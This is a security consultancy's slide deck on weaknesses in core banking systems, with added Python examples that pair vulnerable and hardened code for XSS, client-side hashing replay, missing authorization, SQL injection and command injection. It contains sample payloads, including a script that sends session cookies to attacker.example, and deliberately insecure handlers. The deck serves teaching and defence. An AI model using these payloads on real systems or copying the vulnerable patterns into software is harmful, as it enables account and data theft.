Where the money is – Security of CBS.

  1. Where the money is. – Security of CBS. Advisor for your information security. Version: 1.0. Author: Ulrich Fleck. Responsible: Ulrich Fleck. Date: 27.5.2012. Confidentiality level: Public
  2. Agenda
     • About SEC Consult
     • About the study
     • Threats and drivers for application security in CBS
     • Maturity of application security in CBS
     • Security crash test of selected CBS products
     • Resume
     • Discussion
     (Slide footer, repeated on every slide: Title: Where the money is – CBS Security; Version/Date: 1.0 / 27.5.2012; © 2012 SEC Consult Unternehmensberatung GmbH; Responsible: Ulrich Fleck; Confidentiality Class: Public; All rights reserved)
  3. SEC Consult – Who we are
     • Leading international application security consultancy
     • Founded 2002
     • Headquarters near Vienna, Austria
     • Delivery centers in Austria, Germany, Lithuania and Singapore
     • Strong customer base in Central and Eastern Europe
     • Increasing customer base of clients with global business (esp. out of the Top-10 US and European software vendors)
     • 45+ application security experts
     • Industry focus: banks, software vendors, government
     (Map legend: SEC Consult Headquarter, SEC Consult Office, Other SEC Consult Clients; countries marked: Austria, Germany, Lithuania, Singapore, Canada)
  4. Our key question: What is the promise and the reality of application security for core banking systems???
  5. Part 1 – Answers provided by vendor
     • We created a questionnaire with some 50 questions about security, especially with regard to core banking systems
     • This questionnaire was provided to a preselected set of vendors together with the offer to participate in our study
     • We recommended that the person responsible for IT security should answer, or at least quality-assure, the questions and answers
     • The methodology for the survey part was based on commonly known security standards, best practices and guidelines and the experience of Capgemini and SEC Consult
     Part 2 – Security crash test at vendor
     • As the answers to the questionnaire are just a subjective picture of the vendors themselves, we wanted to perform real-life security crash tests at the vendors
     • Therefore we offered all vendors an application security check conducted by SEC Consult consultants
     • We asked for access to the respective test system and ensured that the test results would only be published at a high level in this study, with detailed reports about the test case results handed over solely to the respective vendor
  6. Alternative Part 2 – Security crash tests at selected banks (Part 1 and Part 2 repeated from slide 5)
     • Some of the vendors were quite interested and seriously considered a "Part 2" participation; however, none of the vendors finally agreed
     • Therefore we had to consider an alternative solution
     • Fortunately three interested banks, showing big interest in this study, gave us the opportunity to perform security crash tests on their systems (three CBS in scope of this study)
     • The applied methodology was based on commonly known security standards for application security, best practices in security tests with a black-box approach, and the experience of SEC Consult
  7. CBS vendors of this study: major vendors relevant for the international and European market.
  9. Attack surface for core banking systems (simplified): Presentation Layer … Business Logic Tier … Database Layer … Databases … Network. Every layer offers potential entry points for an attacker.
  10. What did the vendors say?
     • Information security of the vendor organization: most of the vendors have an Information Security Management System (ISMS) in place
     • Software development organization: roles and responsibilities in the development process are documented in accordance with security policies; 90-100% of the (core) development staff on application security
     • Methods for secure software development: the enforcement of methods for secure software development (Microsoft SDL, OpenSAMM, BSIMM, SSE-CMM) is in progress at some vendors
     • Threat modeling and security requirements: most of the vendors have an up-to-date threat model available for each CBS module
  11. What did the vendors say?
     • Security incident response: most of the vendors have a software security incident response process
     • (Technical) standards and best practices for application security: technical application security best practices and standards for web technologies like OWASP, ÖNORM A 7700 (Security requirements for web applications), etc. are already important for vendors; data privacy standards for applications like EuroPriSe are not in focus yet; no certifications have been conducted on application security
  12. What did the vendors say about complexity? (chart only)
  13. What did the vendors say? – Internal QA
     • Security vulnerabilities identified from 1.1.2008 till 30.6.2010 by internal QA/testers before the software was released: many vendors don't provide an answer; the range is from "none" to hundreds
     • Security vulnerabilities identified from 1.1.2008 till 30.6.2010 in already released software modules ("zero-day vulnerabilities"): many vendors don't provide an answer; the range is from "none" to hundreds
  14. Test coverage for application security: significant differences in the test coverage for different test approaches between the vendors.
  15. How do you define the maturity level of state-of-the-art (application) security for your CBS product?
     Vendor answers: "30+ years with no known security issues." – "strong & impenetrable security foundation" – "Highly sophisticated" – "CMMi Level 4." – "High Mature." – "Mature." – "Mature."
     All vendors position themselves to achieve (at least) state-of-the-art application security. This is a clear and consistent commitment and promise to the market.
  16. Crash test for 3 CBS (out of 8)
     Test set-up:
     • None of the eight vendors accepted the offer of a free-of-charge security crash test
     • 3 major European banks stepped in with 3 products of this study – Thanks!!!
     • Crash test with black-box approach and limited effort budget (approx. 15 person-days for each product)
     • Access to the CBS with one low-privilege user account (standard user)
     Test objective for a crash test:
     • Check for toxic (= seriously insecure) software
     • Identify application security vulnerabilities in the CBS that break the confidentiality, availability or integrity of the CBS
     (Image source: http://www.spiegel.de/fotostrecke/fotostrecke-22584-3.html)
  17. Why attack the CBS from a standard workplace?
     The attacker has several choices to get access to a standard workplace:
     • One active Trojan horse (malware)
     • Access by cleaning personnel, maintenance, contractors, volunteers, etc.
     • Drive-by infection from website(s)
     • …
     Then the attacker starts to look for vulnerabilities to access the Core Banking System in depth… (Diagram: standard workplace for CBS → browser → Core Banking System)
     For the test we used a low-privilege user and tried to expand the privileges and to access sensitive data of the Core Banking System.
  18. Hundreds to thousands of CBS standard workplaces to choose from. For the test we used a low-privilege user and tried to expand the privileges and to access sensitive data of the Core Banking System.
  19. Standard black-box approach – Tasks:
     • Use selected special tools and scripts for exploiting security vulnerabilities based on vulnerability classes
     • Check compliance with state-of-the-art standards for application security (ÖNORM A 7700, OWASP, …)
     • Adapt or write new exploit code if necessary
     • Validate vulnerabilities
     • Develop proof-of-concept material (screenshots, dumps, passwords, etc.)
     • Assess risk and define recommendations
     (Diagram: attack against Presentation Layer, Business Logic Tier, Database Layer, Database, Network)
  20. CBS – Cross-site scripting
     • The problem: a cross-site scripting vulnerability is used to steal the identity information of a CBS user. First the attacker writes an email to this user with a malicious link, including hidden script code (a very short program). The user receives the email and clicks on the link. The malicious script runs in (the context of) the web browser of the attacked user.
     • Vulnerability class: web application security – input and output validation
     • Impact for bank: account theft; remote control of the web browser; recording of all activities of the user; changes to transactions on the fly (e.g. the target account number of a transaction)
     • Secure software development: Architecture/Design: Failed; Programming: Failed; Test and Quality Assurance: Failed
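The reflected cross-site scripting scenario on this slide (a mailed link whose parameter is echoed into the page, a script that runs in the victim's browser and reads the session cookie) is shown below as an added example; it is not code from the deck or from any of the tested products. The parameter name `q`, the cookie name `CBSSESSION` and the attacker host are assumptions, and the malicious query string is constructed for the example.

```python
import html
from urllib.parse import parse_qs

# Constructed sample: the query string of the link the attacker mailed to the user.
# Decoded, "q" is: <script>document.location='http://attacker.example/?'+document.cookie</script>
MALICIOUS_QUERY = (
    "q=%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example%2F%3F%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


def render_search_vulnerable(query_string: str) -> str:
    """Reflects the search term into the page unescaped: the attacker's
    <script> element is emitted as markup and executes in the victim's browser."""
    term = parse_qs(query_string).get("q", [""])[0]
    return f"<h1>Results for {term}</h1>"


def render_search_hardened(query_string: str) -> str:
    """Output encoding: every reflected value is HTML-escaped, so '<' becomes
    '&lt;' and the browser renders the payload as text instead of running it."""
    term = parse_qs(query_string).get("q", [""])[0]
    return f"<h1>Results for {html.escape(term, quote=True)}</h1>"


def security_headers(session_id: str) -> dict:
    """Second line of defence against the 'account theft' impact: the session
    cookie is HttpOnly (document.cookie cannot read it) and the CSP forbids
    inline script, so a reflected payload that slips through does less damage."""
    return {
        "Set-Cookie": f"CBSSESSION={session_id}; Secure; HttpOnly; SameSite=Strict",
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; object-src 'none'",
    }


def contains_script_tag(page: str) -> bool:
    """Crude check used to compare the two renderers: is there a live <script> tag?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    print(render_search_vulnerable(MALICIOUS_QUERY))
    print(render_search_hardened(MALICIOUS_QUERY))
    print(security_headers("0123abcd"))
```

The escaping belongs at the point where the value is written into HTML (a template engine with auto-escaping does this for you); input validation alone does not help, because the attacker, not the application, chooses the input. The headers do not fix the XSS, they only limit what a successful payload can reach.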
  21. CBS – Weak encryption
     • The problem: first the attacker traces the data traffic between the CBS client and the CBS server. Due to the weak-encryption vulnerability of the CBS, the attacker can bypass the login mechanism.
     • Vulnerability class: design flaw in client-server communication (the hash is built on the client)
     • Impact for bank: account theft; privilege escalation; misuse of the account of the user
     • Secure software development: Architecture/Design: Failed; Programming: Failed; Test and Quality Assurance: Failed
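Why "the hash is built on the client" lets a traffic sniffer bypass the login: whatever the client sends is compared directly with the stored value, so the captured message is a password equivalent and can simply be replayed. The added example below reconstructs that class of flaw and contrasts it with a server-issued, single-use challenge; it is not the tested product's protocol or code, the user record and password are constructed, and the use of an unsalted SHA-256 as the stored secret is only to keep the replay point visible.

```python
import hashlib
import hmac
import secrets

# Constructed user store: what the server holds for one CBS user (assumed layout).
USERS = {"teller01": {"pw_hash": hashlib.sha256(b"Winter2012!").hexdigest()}}


# --- Design as described on the slide: the client hashes the password and sends
# the hash; the server compares it with the stored hash. Anyone who can read the
# wire (no TLS, or TLS terminated in front of a plaintext hop) can replay it. ---
def client_weak(username: str, password: str) -> dict:
    return {"user": username, "hash": hashlib.sha256(password.encode()).hexdigest()}


def server_weak(msg: dict) -> bool:
    rec = USERS.get(msg["user"])
    return rec is not None and hmac.compare_digest(rec["pw_hash"], msg["hash"])


# --- Hardened: the server issues a random nonce per login attempt, the client
# proves possession of the secret with an HMAC over that nonce, and the nonce is
# consumed on first use, so a captured proof is worthless for a second login. ---
class ChallengeServer:
    def __init__(self) -> None:
        self.pending: dict[str, str] = {}

    def challenge(self, username: str) -> str:
        nonce = secrets.token_hex(16)
        self.pending[username] = nonce
        return nonce

    def verify(self, msg: dict) -> bool:
        rec = USERS.get(msg["user"])
        nonce = self.pending.pop(msg["user"], None)  # single use, replay fails here
        if rec is None or nonce is None:
            return False
        key = bytes.fromhex(rec["pw_hash"])
        expected = hmac.new(key, nonce.encode(), "sha256").hexdigest()
        return hmac.compare_digest(expected, msg["proof"])


def client_challenge(username: str, password: str, nonce: str) -> dict:
    key = hashlib.sha256(password.encode()).digest()
    return {"user": username, "proof": hmac.new(key, nonce.encode(), "sha256").hexdigest()}


def replay_attack_weak() -> bool:
    """Attacker replays a sniffed login message against the weak server."""
    captured = client_weak("teller01", "Winter2012!")  # as seen on the wire
    return server_weak(captured)                       # True: the hash IS the password


def replay_attack_challenge() -> bool:
    """Same replay against the challenge-response server."""
    srv = ChallengeServer()
    nonce = srv.challenge("teller01")
    captured = client_challenge("teller01", "Winter2012!", nonce)
    assert srv.verify(captured)      # the legitimate login succeeds once
    srv.challenge("teller01")        # victim (or attacker) starts a new login
    return srv.verify(captured)      # False: proof was bound to the old nonce


if __name__ == "__main__":
    print("weak login replayable:", replay_attack_weak())
    print("challenge login replayable:", replay_attack_challenge())
```

The challenge-response stops replay, but the server-side record is still a password equivalent for anyone who dumps the user table; in practice the login runs over TLS with the password verified against a salted, slow hash on the server (or a SCRAM-style scheme with separate stored and client keys), and client-side hashing is never the secret that the server accepts as-is.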
  22. CBS – Privilege escalation – missing authorization
     • The problem: by enumerating several request parameters, arbitrary accounts can be taken over and misused by non-privileged users.
     • Vulnerability class: design flaw based on missing authorization
     • Impact for bank: account theft; privilege escalation (the attacker becomes a more powerful user); access to administrative functionality; the attacker can misuse the CBS by performing high-privilege transactions and functions
     • Secure software development: Architecture/Design: Failed; Programming: Failed; Test and Quality Assurance: Failed
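The enumeration described here works when the application looks up whatever identifier the request carries and never asks whether the logged-in user may see that record. The added example below (not from the deck or any tested product; the account table, roles and the `account_id` parameter are constructed for illustration) shows the missing check, the server-side ownership check that closes it, and the enumeration loop a low-privilege tester runs to measure the exposure.

```python
# Constructed account table and role table (assumed layout for the example).
ACCOUNTS = {
    1001: {"owner": "teller01", "balance": 1200.00},
    1002: {"owner": "teller02", "balance": 89000.00},
    1003: {"owner": "admin", "balance": 0.0, "admin_functions": True},
}
ROLES = {"teller01": "standard", "teller02": "standard", "admin": "administrator"}


def view_account_vulnerable(session_user: str, params: dict):
    """Trusts the account_id request parameter: any authenticated user reads
    any account. The session user is never consulted."""
    return ACCOUNTS.get(int(params["account_id"]))


def view_account_hardened(session_user: str, params: dict):
    """Authorization is decided server-side from the session, not from the
    parameter: the record is returned only to its owner or an administrator."""
    acct = ACCOUNTS.get(int(params["account_id"]))
    if acct is None:
        return None
    if acct["owner"] != session_user and ROLES.get(session_user) != "administrator":
        return None  # deny; a real system also logs the attempt for detection
    return acct


def enumerate_accounts(handler, session_user: str, id_range) -> dict:
    """What the crash test did: walk the parameter space with a low-privilege
    user and collect every record the application hands back."""
    reachable = {}
    for account_id in id_range:
        rec = handler(session_user, {"account_id": str(account_id)})
        if rec is not None:
            reachable[account_id] = rec["owner"]
    return reachable


if __name__ == "__main__":
    ids = range(1000, 1010)
    print("vulnerable:", enumerate_accounts(view_account_vulnerable, "teller01", ids))
    print("hardened:  ", enumerate_accounts(view_account_hardened, "teller01", ids))
```

Unguessable identifiers only slow the enumeration down; the fix is the ownership check on every object access, applied in one place (a data-access layer or a central authorization hook) rather than re-implemented per screen.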
  23. CBS – SQL injection
     • The problem: nothing to add here; this should be an extinct vulnerability class
     • Vulnerability class: web application security – input validation and design flaw
     • Impact for bank: extraction of valuable data from the database (data theft); manipulation of data in the database; account theft; privilege escalation
     • Secure software development: Architecture/Design: Failed; Programming: Failed; Test and Quality Assurance: Failed
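Added example for the "data theft" impact on this slide, using an in-memory SQLite table constructed for the purpose (not the deck's code, not a real CBS schema): a customer search that limits results to the logged-in advisor's own customers, built once by string concatenation and once with bound parameters, and the injection string that turns the first into a dump of every row.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data: three customers, assigned to two advisors."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE customers (id INTEGER, name TEXT, iban TEXT, advisor TEXT)")
    db.executemany(
        "INSERT INTO customers VALUES (?, ?, ?, ?)",
        [
            (1, "A. Example", "AT00 0000 0000 0000 0001", "teller01"),
            (2, "B. Example", "AT00 0000 0000 0000 0002", "teller02"),
            (3, "C. Example", "AT00 0000 0000 0000 0003", "teller02"),
        ],
    )
    return db


def search_vulnerable(db: sqlite3.Connection, advisor: str, name_filter: str) -> list:
    """The request value is spliced into the SQL text, so it can close the
    string literal and append its own WHERE logic."""
    sql = (
        "SELECT id, name, iban FROM customers WHERE advisor = '" + advisor
        + "' AND name LIKE '%" + name_filter + "%'"
    )
    return db.execute(sql).fetchall()


def search_hardened(db: sqlite3.Connection, advisor: str, name_filter: str) -> list:
    """Bound parameters: the driver sends the value separately from the SQL
    text, so it can only ever be a LIKE pattern, never grammar."""
    sql = "SELECT id, name, iban FROM customers WHERE advisor = ? AND name LIKE ?"
    return db.execute(sql, (advisor, f"%{name_filter}%")).fetchall()


# Constructed injection string: closes the LIKE literal, ORs in a tautology that
# defeats the advisor restriction, and comments out the rest of the statement.
PAYLOAD = "%' OR '1'='1' --"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, attacker as teller01:", search_vulnerable(db, "teller01", PAYLOAD))
    print("hardened,   attacker as teller01:", search_hardened(db, "teller01", PAYLOAD))
```

With the payload the vulnerable query becomes `... WHERE advisor = 'teller01' AND name LIKE '%%' OR '1'='1' --%'`, and since AND binds tighter than OR, the advisor filter no longer matters. The same application-level account (`advisor = ?`) should also be the only data the database user can reach: a read-only role per tier limits what a successful injection can extract or modify.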
  24. CBS – Direct OS command execution
     • The problem: several flaws led to access to the underlying operating system for non-privileged users.
     • Vulnerability class: web application security – input validation and design flaw
     • Impact for bank: control over the operating system of the CBS server; the CBS can be shut down, wiped or manipulated with wrong data by the attacker; data of the server can be copied to a repository of the attacker; additionally, this vulnerability can be used to attack other systems of the bank; account theft and privilege escalation; total compromise of the system, data backends etc.
     • Secure software development: Architecture/Design: Failed; Programming: Failed; Test and Quality Assurance: Failed
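The slide does not say which application function exposed the operating system, so the added example below uses an assumed one: a report download that builds a shell command from a request parameter. It is not code from the deck or from a tested product; the report directory, the parameter and the injection string are constructed. Nothing is executed; the functions only return the command the application would hand to the shell (or to `subprocess.run` without a shell), and `shlex` shows how the shell would split it.

```python
import re
import shlex

REPORT_DIR = "/var/cbs/reports"              # hypothetical path for the example
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]{1,64}")  # allow-list: no '/', '.', ';', spaces


def command_vulnerable(report_name: str) -> str:
    """Shell string as it would be passed to subprocess.run(cmd, shell=True):
    the request value is spliced straight into shell syntax."""
    return f"cat {REPORT_DIR}/{report_name}.pdf"


def command_quoted(report_name: str) -> str:
    """Still a shell string, but the value is a single quoted word, so ';', '#'
    and whitespace lose their meaning to the shell. Acceptable only when a
    shell really is unavoidable."""
    return f"cat {shlex.quote(REPORT_DIR + '/' + report_name + '.pdf')}"


def argv_hardened(report_name: str) -> list:
    """Preferred form: allow-list the value first, then build an argv list for
    subprocess.run(argv) with no shell in the picture at all."""
    if not SAFE_NAME.fullmatch(report_name):
        raise ValueError("report name rejected")
    return ["cat", f"{REPORT_DIR}/{report_name}.pdf"]


def rejected(report_name: str) -> bool:
    """True if the hardened path refuses the value."""
    try:
        argv_hardened(report_name)
    except ValueError:
        return True
    return False


def shell_words(cmd: str) -> list:
    """POSIX word splitting of the command string (inspection only). shlex does
    not interpret ';', but a real shell would run 'id' as a second command."""
    return shlex.split(cmd)


# Constructed injection string: ends the intended command, runs another, and
# comments out the trailing '.pdf'.
PAYLOAD = "q1; id; #"


if __name__ == "__main__":
    print("vulnerable:", shell_words(command_vulnerable(PAYLOAD)))
    print("quoted:    ", shell_words(command_quoted(PAYLOAD)))
    print("hardened rejects payload:", rejected(PAYLOAD))
    print("hardened accepts q1-2012:", argv_hardened("q1-2012"))
```

The allow-list also blocks path traversal (`../../etc/passwd` contains characters outside the pattern), which the quoting alone does not. Running the application as an unprivileged OS user with a minimal file-system view is the third layer; it does not prevent the injection but keeps "total compromise of the system" off the table.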
  25. Summarizing – FAILED!
     • 3 of 3 tested CBS fail application security standards (e.g. Open Web Application Security Project (OWASP), WASC, BSI ISi-Reihe (Germany), ÖNORM A 7700 (Austria), etc.)
     • 3 of 3 tested CBS are not state of the art in application security, in contrast to the vendors' self-assessments ("CMMi Level 4.", "High Mature.", "Mature.", "Mature.")
     • 3 of 3 tested CBS have deficiencies in secure software development: Architecture/Design: Failed; Programming: Failed; Test and Quality Assurance: Failed
  26. Business impact for banks
     • The vulnerabilities found in 3 of 3 tested CBS enable unauthorized access, disable segregation of duties, circumvent the effectiveness of auditing and logging, and circumvent the effectiveness of strict access control and enable privilege escalation
     • and therefore can cause violations of compliance requirements such as Basel II, SAS 70, ISO 27001, national data privacy protection laws, national banking-specific laws, etc.
     (Diagram: attacks against Presentation Layer, Business Logic Tier, Database Layer, Database, Network)
  27. What to do if you are a bank?
     Demand state-of-the-art application security for CBS:
     • Vendor contracts with mandatory state-of-the-art application security requirements
     • Define penalties for not achieving state-of-the-art application security requirements
     • Cost sharing for unsuccessful application security tests
     Prove the vendor claims and promises by testing the application security of the CBS:
     • Application security tests (security quality gates)
     Establish additional, multiple lines of defense:
     • Measures to at least temporarily mitigate some risks of an insecure CBS on other levels of defense (infrastructure, organizational, awareness of users, etc.)
     The best point in time to detect toxic (= seriously insecure) software is when you buy it.
  28. Software vendors already using SEC Consult. (Slide reused from: SEC Consult Software Security Assurance Services, Version/Date 1.1 / May 2011, © 2011 SEC Consult Unternehmensberatung GmbH, Responsible: U. Fleck)
  29. How to reach us/me?
     Ulrich Fleck, Director Sales and Business Development, +43 676 840 301 719, Email: u.fleck@sec-consult.com
     SEC Consult, Mooslackengasse 17, A-1190 Vienna, Austria; Tel: +43-(0)1-890 30 43-0; Fax: +43-(0)1-890 30 43-15; Email: office@sec-consult.com; www.sec-consult.com
